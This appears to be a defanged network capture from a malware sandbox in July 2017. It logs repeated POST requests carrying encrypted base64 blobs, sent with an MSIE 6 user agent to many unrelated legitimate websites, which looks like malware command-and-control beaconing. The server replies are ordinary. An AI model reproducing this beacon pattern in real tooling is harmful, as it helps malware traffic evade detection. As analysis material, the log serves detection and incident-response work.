Host: trinity-works.com
Connection: Keep-Alive
Cache-Control: no-cache

6CxdnPtpaHS gffvkld5GeRRPGIBHEl0X3NhvAXO/aWBjSikOSGbyBklWLayb/TGK5Hh07d6HJZlSuuJ91K7KM7qaieONo8Q97hoKiDzhS5jWrYzGFxzqicBoX/0RbtY5n29GSw1Sagw/XYLMtjbse/xl7kXRdhC7L6ZBuLbNJM03Q4JeEV1rqydu/eoJ7HOGf9S98pCCG8b2YCh0g7f85azn2xgZQGLdWhl1Q9A8XGFoAKfSEclplAyNOpRZrzMmR0GSWVdLzbRpa92nl02wk9bx1AzXNzK7rjdjwM94MNd2vlNwnrJYiP9HNQAmxhxjSgAFl/gnKINh4RVHVMUvRKXUpmZcGuLfqe3JWC8du4iFJkNw4pTCNey/U8Exg6aaiyGT2L8XXHkMoUXa5Ny1sGs0oEREumfZZBiknYQsN9 5lUe/YsAqg3GzRxuhn7wrqD/blUOcnAH l3Z6UJ3l6x8VPNSbkxNA8PO
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:04 GMT
Server: Apache/2.2.31
Content-Length: 202
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.</body></html>.
HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11:17:04 GMT..Server: A
pache/2.2.31..Content-Length: 202..Keep-Alive: timeout=5, max=100..Con
nection: Keep-Alive..Content-Type: text/html; charset=iso-8859-1..<
!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><h
ead>.<title>403 Forbidden</title>.</head><body
>.<h1>Forbidden</h1>.<p>You don't have permission
to access /.on this server.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thedonaldsongroup.com
Connection: Keep-Alive
Cache-Control: no-cache

riZmfQtsgYghn3TWYtEgSXRy/IZRL3ynb9b4OG8k5sDd3w633yDwtuE5MNagSGbKiWerAJosJ7FDZbjaT NSxgXVVbkZWyBbiwjO0LaRldnUgN69M3QTBRaX8kSs5j2FFizc8JqCrjWT5FE8eNR3CMwVfHEx 6svG7zkfv909H4PRNbHwMG54SF43tDYTHpM7dKX33dsJeJEQXb1Pa0 XRgBv6UxklOnRb/0LscrB lD6rJjCjk3AXi4dnbc8wEdxVO10FZL dbdEqDoX5zMxBi/YsHjhKH/5cUEEjlmYTjRmKDmThvBaj6yMHU sUTlZ4TEatXGVURhsmHSCSi9nMTczGw4AUR8NRYlekYgQNyE xr2hqz6xzG7cuErjG5tdZ/waNkXZh4UTepT1LPYmDZiDuQxfdboiVxpYcLB6fu4rKSHelW ZryRSvaD4h/rrcB1N19xP2NRn0GjcfgiVcqBSkg5h76GHqaOhaxNO987YSNUXufk0eHUkvOj2Moaehcu
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:28 GMT
Server: Apache
Location: hXXps://thedonaldsongroup.com/
Cache-Control: max-age=0
Expires: Sat, 01 Jul 2017 11:17:28 GMT
Content-Length: 238
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXps://thedonaldsongroup.com/">here&
lt;/a>.</p>.</body></html>.HTTP/1.1 301 Moved Per
manently..Date: Sat, 01 Jul 2017 11:17:28 GMT..Server: Apache..Locatio
n: hXXps://thedonaldsongroup.com/..Cache-Control: max-age=0..Expires:
Sat, 01 Jul 2017 11:17:28 GMT..Content-Length: 238..Keep-Alive: timeou
t=5, max=100..Connection: Keep-Alive..Content-Type: text/html; charset
=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.
<html><head>.<title>301 Moved Permanently</title&
gt;.</head><body>.<h1>Moved Permanently</h1>.&
lt;p>The document has moved <a href="hXXps://thedonaldsongroup.c
om/">here</a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: padstow.com
Connection: Keep-Alive
Cache-Control: no-cache

lyb4cwfl5V3do2ZcNl4L NDc6pz94YyLK/koy2ppHCH4HUqeGI3Xxw0j6JZuJ4cvJlOU4DL1TIpBs3OBCa55sZ0FDjehKi g3Sj8taftAtQLAbc8nAjhEdV4O55k1ajAb1veLK0V57pnUGihu7PdjM9/uYLmoq6jdMRNBFovKe277a0HhpxHqDj1/qjJxdZ1g8Fs2aP0NBdl/peqBKzrzUvDIBhQwNzZmjB91HYUcV48t5bXYaafUkp5bS58B9CzxXeGJOwHv6Ae0EWGUoXDEFY IpsJQNmjgkFO4vMaGNlCfpNuwknryxuYIkZj1T8ndwgtbWWFDTGTn32fnNqALvSxUPcu/aame oFOiPZCeaS4PK1/PmQhRHX5I6497mew/CmzsXM5sw0gcB12LeOXjyiSk7ntDdADNE7/umMTxjWKVDxZhCmbw==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Last-Modified: Thu, 22 Jun 2017 23:18:53 GMT
ETag: "a3166-15ac-55294b547261b"
Accept-Ranges: bytes
Content-Length: 5548
X-Powered-By: PleskLin
MS-Author-Via: DAV
Connection: close
Content-Type: text/html
<!DOCTYPE html>.<html lang="en" dir="ltr" class="sid-plesk"&g
t;.<head>. <title>Domain Default page</title>.
<meta name='copyright' content='Copyright 1999-2015. Parallels IP
Holdings GmbH. All Rights Reserved.'>. <meta charset="utf-8"&
gt;. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=
1">. <meta name="viewport" content="width=device-width, initi
al-scale=1.0, maximum-scale=1.0">. <meta http-equiv="Cache-Co
ntrol" content="no-cache">. <link rel="shortcut icon" href="f
avicon.ico">. <link rel="stylesheet" href="css/style.css">
.</head>.<body>..<div class="page-container">. &l
t;!-- start: PAGE HEADER-->. <div class="page-header-wrapper"
>. <div class="page-header">. <a class="
product-logo" href="hXXp://VVV.plesk.com/" target="_blank"><img
src="img/logo.png" alt="Plesk"></a>. </div>.
</div>. <!-- end: PAGE HEADER-->.. <!-- start: PA
GE CONTENT-->. <div class="page-content-wrapper">.
<div class="page-content">.. <div class="page-info
-wrapper">. <div class="page-info">.
<div class="page-info-heading">If you are seeing this
message, the website for <script>document.write('<a href="htt
p://' (location.hostname.indexOf(':')>=0?'[' location.hostname ']
':location.hostname) '">' location.hostname '</a>')

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kagu-hokuren.com
Connection: Keep-Alive
Cache-Control: no-cache

FgunqkpuWWtGOCw5rQklFw2SLA/6Y0PUHjUf5gADCO3Bll3qmR8McmBjvwZ744uvD2J PhkWQNfKEHqqyKc/0671Pi84BUz55HGnl2 6hgkjBt9pQrZDCvoa//YxiYY8tSVCvawA4mxCm5yFjh7Gqg8IpjbMzMH61x56E1owteK6z4Siy14xJW/YGf7l0JPjWOhYYFaOvvmkvXsIt9WFgaVgBaNU11o30TMZJkXtAHv5c2W Al9frqNaddvAw6vCjpJFsS94sdP/daD x450eyUnW0No1kjrz O1Pz8lkblRugK6tg/AxaqQkE4orLmy1lUGMKIF1WM9utFDfI3CRDkjidEvPrGAn1y5L5TXVg6cUhi  ha8UJmQbzbZDvJ8os3rxe9oQudifGc2qDzhZHyZMwaHqJnb1XbhjLx9sAm/dgRNzK8jlYHEkxP17YwNIPuXtH1XuvPozunm3ko9AAH86qWnAuO ZtOe zbiRI4pw5/iOyRtzPSIkOi/e1jpurWmZCADuC4zuIA=
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:54 GMT
Server: Apache
Location: hXXp://VVV.kagu-hokuren.com/
Content-Length: 212
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://VVV.kagu-hokuren.com/">here</a>.</p>.</
body></html>.HTTP/1.1 302 Found..Date: Sat, 01 Jul 2017 11:16
:54 GMT..Server: Apache..Location: hXXp://VVV.kagu-hokuren.com/..Conte
nt-Length: 212..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive
..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLI
C "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title&g
t;302 Found</title>.</head><body>.<h1>Found<
;/h1>.<p>The document has moved <a href="hXXp://VVV.kagu-h
okuren.com/">here</a>.</p>.</body></html>..
.


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrJdiQ/icg9B19asFe73bPYs+reAQUdXGnGUgZvJ2d6kFH35TESHeZ03kCEFslzmkHxCZVZtM5DJmpVK0= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.comodoca4.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:49 GMT
Server: Apache
Last-Modified: Wed, 28 Jun 2017 15:09:48 GMT
Expires: Wed, 05 Jul 2017 15:09:48 GMT
ETag: B0086859F9EAB86A413490F340C4A14BB9FE60E3
Cache-Control: max-age=358978,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp32
Content-Length: 314
Connection: close
Content-Type: application/ocsp-response
0..6....../0.. .. .....0......0...0......uq..H.....AG...Hw..y..2017062
8150948Z0s0q0I0... .........%...' ..}j.^.v.b..x..uq..H.....AG...Hw..y.
.[%.i..&Uf.9...T.....20170628150948Z....20170705150948Z0...*.H.=....i.
0f.1..........5......:PuQ?.\..... 2.'1w.c..V._...~.?w.1...W.Y..5_Y..P.
.Z.'..c......I...U...#.a..f...>..T..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 424
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: taykon.com
Connection: Keep-Alive
Cache-Control: no-cache

Hft3Y/iyqIz1EWLke9mGEutsPzFAubLXrN083/VsgablW9ehhhrmL8sPHHmyDyM17UETJdd7m Eav4T2S3TOm1q8LL4N4f0WYROmtUFZECc5pvkZcEEvHlOcDPNbMwxgsdQLMXKoV S4yZvug3klKZJXCtGsUgkA/gUuatPDtbbbEvxr8CBdx SIseOSJiuuIeTtTGyr/EYDwNitvyXHqJ/S2VteuH y/dY9O44zo4ZxyqJZyCTXnv9RqlWRFP33Tg1MKINrxZMdVfcCwp8NZRgSK/2kL/DfcWFD1kYhrRLTX50jOoajNe8glSD13w8paUQAbvrQfzLieRUZo/Yfi22g0pjV9c6zGkSuqU5N7rqdk/7Yok 5wzlY51bjhbj3HiNWjiTULfvQg58X50HU HzKyYW3zU2dOkN92A==
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.taykon.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 01 Jul 2017 11:18:02 GMT
Content-Length: 145
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.taykon.com/">here</a></body>HTTP/
1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Loc
ation: hXXp://VVV.taykon.com/..Server: Microsoft-IIS/8.5..X-Powered-By
: ASP.NET..X-Powered-By-Plesk: PleskWin..Date: Sat, 01 Jul 2017 11:18:
02 GMT..Content-Length: 145..<head><title>Document Moved&l
t;/title></head>.<body><h1>Object Moved</h1>
;This document may be found <a HREF="hXXp://VVV.taykon.com/">her
e</a></body>..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: safetyconnection.ca
Connection: Keep-Alive
Cache-Control: no-cache

l ZAufK1eW rxXzwJZy9KPU//CbCOMHERht4I P lc8ABMrv047/DcAaFc0A43TzArb6iTkNxtl3QITlyaWYLgAwy0ft54jQWJg1bZjO lhybm1L1Q2MPI8dZj//kaR00zj/p5/IC8rcGTpoZBxL7HlTUTsvqirwlND83WAg9IdzaeWDCsL2qeEZwbeso8UfNpfAi 3vU6cs4w2s FDog6nyqgq4bXUyMyaDLLSju9ZN0p CYZIEI9QQt x3s6RCyf7/91AQ2nJOSiDRDJmFZjuxHcrYIGZ/2doL3Dtqn rHO99V2JXsJd3QlAtpQYsrEiPZTlR0BNJwh7cw0yIbv/N2tz11UYip2ETJTL4rCUFP9dfm5Tx7oEMRhEEXuPOdR2PkB3uEvgXYcITqzv7cvH qD9rXZZKOQXR9QBBkrKgW92CXGfE nBjIGQGAKFkrAxSyPHNPK4R668vbaekoy6qzGmkQoh2ObDljVg==
HTTP/1.1 503 Service Unavailable
Date: Sat, 01 Jul 2017 11:16:58 GMT
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: hXXp://safetyconnection.ca/xmlrpc.php
Retry-After: Thu, 20 Apr 2017 08:45:00 America/Toronto
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
484..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<ht
ml xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta ht
tp-equiv="Content-Type" content="text/html; charset=utf-8" />..<
meta name="viewport" content="width=device-width, initial-scale=1">
..<title>Under Construction</title>..<style>...inlin
e_block_divider1,...inline_block_divider2..{...background-color:#00000
0;..}..@media screen and (max-width: 980px)..{...header..{... backgrou
nd: none repeat scroll 0 0 #FFFFFF;..}.. .footer ..{.. background:
none repeat scroll 0 0 #000000;..}..}..</style>..<link href="
hXXp://safetyconnection.ca/wp-content/plugins/coming-soon-maintenance-
mode-from-acurax/templates/2/style.css" rel="stylesheet" type="text/cs
s" />..<link rel="icon" href="hXXp://safetyconnection.ca/wp-cont
ent/uploads/2017/03/favicon.ico" type="image/png">..<script src
="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></
script>..</head>..<body style="background:#e4e4e4">...&
lt;div class="wrapper "> ....<div class="canvas960"> .....<
;div class="inline_block mg_top">.....<div class="header">...
...........30b.......<div id="csma_master_logo">........<img
src="hXXp://safetyconnection.ca/wp-content/uploads/2017/03/blocks_imag
e_6_1.png" alt="Logo">.......</div> <!-- csma_master_logo
-->...........<div class="acx_header_bg_cvr" >.......<

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.espace-hotelier.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.6.30
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 56bddfbcd956ad57b499196540bfebbb=8I/34shHKOI=XSN0PIXULgU=OVt/iE3IMWE=4SwHi0UdmG8=4GTTeq6SGvI=8FQWiu/Ip4g=ewm/o0QoiuU=LHyakeaxu98=; expires=Fri, 21-Jul-2017 11:16:38 GMT; Max-Age=1728000; path=/; domain=espace-hotelier.com; httponly
Set-Cookie: 56bddfbcd956ad57b499196540bfebbb=8I/34shHKOI=XSN0PIXULgU=OVt/iE3IMWE=4SwHi0UdmG8=4GTTeq6SGvI=aDjzuWkYMuQ=vyywKNbUGbI=eSNJUVwihZw=H1beubVqndc=XvgBYhdIwKY=; expires=Fri, 21-Jul-2017 11:16:38 GMT; Max-Age=1728000; path=/; domain=espace-hotelier.com; httponly
Set-Cookie: 56bddfbcd956ad57b499196540bfebbb=8I/34shHKOI=XSN0PIXULgU=OVt/iE3IMWE=4SwHi0UdmG8=4GTTeq6SGvI=aDjzuWkYMuQ=vyywKNbUGbI=pudhmqYAMbg=6Hn4TbrOOTw=8FQWiu/Ip4g=s0QWtWWJKy8=P6aD6LKtBG0=; expires=Fri, 21-Jul-2017 11:16:38 GMT; Max-Age=1727999; path=/; domain=espace-hotelier.com; httponly
Set-Cookie: 56bddfbcd956ad57b499196540bfebbb=8I/34shHKOI=XSN0PIXULgU=OVt/iE3IMWE=4SwHi0UdmG8=4GTTeq6SGvI=aDjzuWkYMuQ=vyywKNbUGbI=pudhmqYAMbg=6Hn4TbrOOTw=+RDgKQhJSUU=mqppAozQu+w=RO+hnzrosMU=8FQWiu/Ip4g=IPP3ya8jp98=X7t0GWZ2U9Y=; expires=Fri, 21-Jul-2017 11:16:38 GMT; Max-Age=1727999; path=/; domain=espace-hotelier.com; httponly
583.....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://w
ww.w3.org/TR/xhtml11/DTD/xhtml11.dtd">..<html xmlns="hXXp://VVV.
w3.org/1999/xhtml" xml:lang="en">...<head>....<title>Es
pace Hotelier</title>....<meta name="description" content="Ac
hat et vente parmi une large s..lection de mat..riel professionnel: Ma
t..riel professionnel de restauration, pizzeria, CHR , SAV. Demandez u
n devis gratuit.Shop powered by PrestaShop" />........<link href
="/espace_hotelier/css/form.css" rel="stylesheet" type="text/css" medi
a="all" />....<meta http-equiv="Content-Type" content="applicati
on/xhtml xml; charset=iso-8859-1" />....<meta name="generator" c
ontent="PrestaShop" />....<meta name="robots" content="index,fol
low" />....<meta name="msvalidate.01" content="BDED849E5590FD19D
7BAB2FE8C492EAF" />....<meta name="viewport" content="width=devi
ce-width, initial-scale=1.0">....<link rel="icon" type="image/vn
d.microsoft.icon" href="/img/favicon.ico" />....<link rel="short
cut icon" type="image/x-icon" href="/img/favicon.ico" />....<lin
k href="../../ig/style.css" rel="stylesheet" type="text/css" media="al
l">..<!--[if IE 7]> <link href="themes/prestashop/css/styl
eIE8.css" rel="stylesheet" type="text/css" media="all"><![endif]
-->..<!--[if IE 8]><link href="themes/prestashop/css/style
IE8.css" rel="stylesheet" type="text/css" media="all"><![endif]-
->....<link href="/themes/prestashop/css/global.css" rel="st

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: graintrain.coop
Connection: Keep-Alive
Cache-Control: no-cache

dPdHctF aHBOsEkVcKmt9ir/lo6PmCtclRpg6pPw1kxeA GxfUttYHDDpoq2jMwWJ4anxmJyjy9fADp2qbY5lF89AkaafOhsZ4r7JqKS 7Ew9UJT1LKB yGRZI66giPUix86cNuB99wIiBxT8lXU6jPJjteNSUc4gKOnYB 8cEluOXYmnYrTKVwh84U1c8cEuAW7v3Fht37xL0NDpuOtKDQo8DlV5vtOvQAhL7NCYjGUSjR90vElVNUyXrMtJ0U857FcI5aKdpxXNWQ9UP2RsREAxTWKeoQJ9nguCVbYBUHybJnIjbByeypx9vOODT7pox19yKoKwwDvMvjHAifvYVoWqCImaLY0yFGH5q2Nz4wiXPQR9EM6GtCJp9HO1UhQnqzRXvzHzi39yIDkVHNcgoEbz gYc9zgMqFVySLsWPA3zCPv/dlBE9MyOQi1xBT31H jXN2meQXZau1Lv0NMtxlvF0BcK7bsMdYcsvFdFP/rNyYSgG3H7P0P
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 01 Jul 2017 11:16:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 15
X-Sorting-Hat-PodId-Cached: 1
X-Sorting-Hat-ShopId: 2864598
X-Sorting-Hat-Section: pod
X-Sorting-Hat-ShopId-Cached: 1
Vary: Accept-Encoding
X-ShopId: 2864598
X-ShardId: 15
Content-Language: en
Cache-Control: no-cache, no-store
Set-Cookie: cart_sig=; path=/; expires=Sat, 15 Jul 2017 11:16:59 -0000; HttpOnly
X-Request-Id: f092ca96-dbb8-4a6a-b4b0-7b7f539f5191
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block; report=/xss-report?source[action]=not_found&source[app]=Shopify&source[controller]=storefront_section/shop&source[section]=storefront&source[uuid]=f092ca96-dbb8-4a6a-b4b0-7b7f539f5191
X-Dc: ash
4d2f..<!DOCTYPE html>.<!--[if lte IE 7 ]>   <html class
="no-js ie7"> <![endif]-->.<!--[if IE 8 ]> <html c
lass="no-js ie8"> <![endif]-->.<!--[if (gt IE 8)|!(IE)]>
;<!--> <html class="no-js"> <!--<![endif]-->.<
head>. <!-- Version 1.4.8 -->. <meta charset="UTF-8"
>. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome
=1">. <meta name="viewport" content="width=device-width,initi
al-scale=1.0" />. . . <title>Page Not Found | Grain
Train</title>. . . . <meta name="description" con
tent="" />. . . <link rel="canonical" href="" />.
. . . <link rel="shortcut icon" type="image/x-icon" h
ref="//cdn.shopify.com/s/files/1/0286/4598/t/2/assets/favicon.ico?1253
5439266522054027">. . . . .<meta property="og:site_n
ame" content="Grain Train" />.. <meta property="og:type" cont
ent="website" />. . <meta property="og:image" content="
hXXp://cdn.shopify.com/s/files/1/0286/4598/t/2/assets/logo.png?1253543
9266522054027" />. . .. . <!--. . . .
. . . . <link href="//fonts.goog
leapis.com/css?family=adobe-caslon-pro" rel="stylesheet" type="text/cs
s">. . . . . . . .
<link href="//fonts.googleapis.com/css?family=futura-pt" re
l="stylesheet" type="text/css">. . . .

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ibcd.com.br
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=ffnntm3dop481qkjjvt8vqok82

kj6QdqEU4IqcsrDfACXBlXqh33afKvBXZe2b72q42PH7D6Z20j96 JQHNSBkein8b6ln8XbRu XxO7c34PU3m4xCIl28j1Ir2Jo2N6aRIg3ez9pKjvM9Fmj2Unmxs0PjbQfQPDWHRgTSB6bBcW7jMasly47z08CqYe4CKis0BDN0BiBwrI0E8HC4Y30VLxUe6fZxD0NyCrMOCMfQUwJpCwtuXDGESBurIdCcC5Ad5DWl1CJP4sspwqhP/6TAbX2MGJoRy/ToOOGlPiPSVpG68JIU37 zy5Fh7Zh/dpfUhHlZDIvlrJUjkwfns9qDz7e3hgvyqDrrG/toAvjRDhO7V2NT25V6gDb/YPcNCjp hQ78TjApc8G7I86M6mhPamlx K1/5IMBUBbgJ3jII7WnyHljMlAdFNoUE0VLC3O9NfYgciqzrjfC/rr/1dMh0lmRm8rEsz1f6hgDil70MTtNeIItPs6Qspgm2/cCbJX8vV6wJBmwGjiIjj8=
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:30 GMT
Server: Apache
X-Powered-By: PHP/5.6.30
Retry-After: 3600
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2223..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="h
ttp://VVV.w3.org/1999/xhtml">..<head>.. <meta http-equi
v="Content-Type" content="text/html; charset=UTF-8" />.. <met
a name="description" content="Fa..a seu curso gr..tis e obtenha j.. o
seu certificado v..lido em todo o Brasil" />.. <meta name="vi
ewport" content="width=device-width, initial-scale=1.0">.. ..
<title>IBCD – Instituto Brasileiro de Cursos a Dist..ncia
</title>...... ...<!-- ########## CSS Files ##########
-->.. ....<!-- Framework CSS -->...<link rel="styleshe
et" href="hXXp://ibcd.com.br/wp-content/plugins/dpMaintenance/template
s/default/css/960.css" type="text/css" media="screen" />...<link
rel="stylesheet" href="hXXp://ibcd.com.br/wp-content/plugins/dpMainte
nance/templates/default/css/reset.css" type="text/css" media="screen"
/>...<!-- Screen CSS -->...<link type="text/css" href="htt
p://ibcd.com.br/wp-content/plugins/dpMaintenance/templates/default/the
mes/redmond/jquery-ui-1.8.17.custom.css" rel="stylesheet" />.. &
lt;link type="text/css" href="hXXp://ibcd.com.br/wp-content/plugins/dp
Maintenance/templates/default/css/prettyPhoto.css" rel="stylesheet" /&
gt;.. <link rel="stylesheet" href="hXXp://ibcd.com.br/wp-content
/plugins/dpMaintenance/templates/default/css/style.css" type="text/css
" media="screen" />.. ...<!-- For progressively larger di

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sdlp.ie
Connection: Keep-Alive
Cache-Control: no-cache

U2zmVLvpGIZBlNq1UlMWzKSrqa/BJsFSH9dgJqd4crO8gQV9ZMsZIf0owI9wqTTMOg8XOzP3ZwAcRfIyefFxnqldMvdtavd/d8hO5t2vqgLPLTEVgktM 3BsmsXWsjgnFdzxkMx6tqYwrhmxSpIaHA7fTV7ZNARrNRjtQRX5S1kCawGA18CByBoYGC6E8/Gdfmo5GX3DpgW4aWz0uwhq3qg3sgShzkpFDHjRQwhwgtiInXfflwXfNk1LRULNZPVggw6Iyaazc8ajBlUIfZNvy77ZBBMmJD2m/ZKkQJMRc7XYeVO QPkH56Q8pF491QqGvrnVMpeUuTkBX7AUvTh/jlyVJiBCmOrCKZoH0zFmRIST5u0t8edOLgmZz/TENXrPmLIUjRvR3cy6C1y9efTQkQ9GT8S1iBPYe/rJT8xsv5TzkKb49wjt6Lcr0q321g6SiviQEXcFZRgdrMd0sgPpaXMOCNSjjlHHyry8SMY24OBx ibXQ2ToKjTU92nyPg==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d8cec117441a73d76dc49c7d5e0a5d63f1498907845; expires=Sun, 01-Jul-18 11:17:25 GMT; path=/; domain=.sdlp.ie; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f57015d48436-KBP
1071..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: colourprint.nl
Connection: Keep-Alive
Cache-Control: no-cache

